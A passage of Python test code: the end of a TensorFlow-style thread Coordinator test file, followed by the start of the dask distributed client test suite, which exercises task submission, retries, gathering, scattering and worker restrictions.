with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testClearStopClearsExceptionToo(self):
coord = coordinator.Coordinator()
ev_1 = threading.Event()
threads = [
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_1, None, RuntimeError("First"), True)),
]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
ev_1.set()
coord.join(threads)
coord.clear_stop()
threads = [
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_1, None, RuntimeError("Second"), True)),
]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "Second"):
ev_1.set()
coord.join(threads)
def testRequestStopRaisesIfJoined(self):
coord = coordinator.Coordinator()
# Join the coordinator right away.
coord.join([])
reported = False
with self.assertRaisesRegexp(RuntimeError, "Too late"):
try:
raise RuntimeError("Too late")
except RuntimeError as e:
reported = True
coord.request_stop(e)
self.assertTrue(reported)
# If we clear_stop the exceptions are handled normally.
coord.clear_stop()
try:
raise RuntimeError("After clear")
except RuntimeError as e:
coord.request_stop(e)
with self.assertRaisesRegexp(RuntimeError, "After clear"):
coord.join([])
def testRequestStopRaisesIfJoined_ExcInfo(self):
# Same as testRequestStopRaisesIfJoined but using syc.exc_info().
coord = coordinator.Coordinator()
# Join the coordinator right away.
coord.join([])
reported = False
with self.assertRaisesRegexp(RuntimeError, "Too late"):
try:
raise RuntimeError("Too late")
except RuntimeError:
reported = True
coord.request_stop(sys.exc_info())
self.assertTrue(reported)
# If we clear_stop the exceptions are handled normally.
coord.clear_stop()
try:
raise RuntimeError("After clear")
except RuntimeError:
coord.request_stop(sys.exc_info())
with self.assertRaisesRegexp(RuntimeError, "After clear"):
coord.join([])
def _StopAt0(coord, n):
if n[0] == 0:
coord.request_stop()
else:
n[0] -= 1
class LooperTest(test.TestCase):
def testTargetArgs(self):
n = [3]
coord = coordinator.Coordinator()
thread = coordinator.LooperThread.loop(
coord, 0, target=_StopAt0, args=(coord, n))
coord.join([thread])
self.assertEqual(0, n[0])
def testTargetKwargs(self):
n = [3]
coord = coordinator.Coordinator()
thread = coordinator.LooperThread.loop(
coord, 0, target=_StopAt0, kwargs={
"coord": coord,
"n": n
})
coord.join([thread])
self.assertEqual(0, n[0])
def testTargetMixedArgs(self):
n = [3]
coord = coordinator.Coordinator()
thread = coordinator.LooperThread.loop(
coord, 0, target=_StopAt0, args=(coord,), kwargs={
"n": n
})
coord.join([thread])
self.assertEqual(0, n[0])
if __name__ == "__main__":
test.main()
|
test_client.py | import asyncio
import gc
import inspect
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import warnings
import weakref
import zipfile
from collections import deque
from contextlib import suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
import psutil
import pytest
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import stringify
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.objects import HasWhat, WhoHas
from distributed.scheduler import (
COMPILED,
CollectTaskMetaDataPlugin,
KilledWorker,
Scheduler,
)
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text, tmpfile
from distributed.utils_test import (
TaskStateMetadataPlugin,
_UnhashableCallable,
async_wait_for,
asyncinc,
captured_logger,
cluster,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
inc,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
varying,
wait_for,
)
pytestmark = pytest.mark.ci1
@gen_cluster(client=True)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
"""Test of <https://github.com/dask/distributed/issues/4588>"""
futs = c.map(
lambda x: x ** 2,
range(10),
batch_size=5,
key=[str(x) for x in range(10)],
)
assert len(futs) == 10
await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
with dask.annotate(retries=2):
x = delayed(varying(xargs))()
y = delayed(varying(yargs))()
x, y = c.compute([x, y], optimize_graph=False)
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.compute([x, y, z], optimize_graph=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.persist([x, y, z], optimize_graph=False)
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout="10 ms")
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 30
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
while key in s.tasks and s.tasks[key].who_has:
await asyncio.sleep(0.1)
@gen_cluster(client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key)
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key)
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in a.data
assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
x = 1
with dask.annotate(workers=a.address):
y = delayed(inc)(x)
with dask.annotate(workers=b.address):
z = delayed(inc)(y)
futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert y.key in a.data
assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
while not (L[0].status == L[2].status == "finished"):
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
while c.refcount["x"]:
await asyncio.sleep(0.01)
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
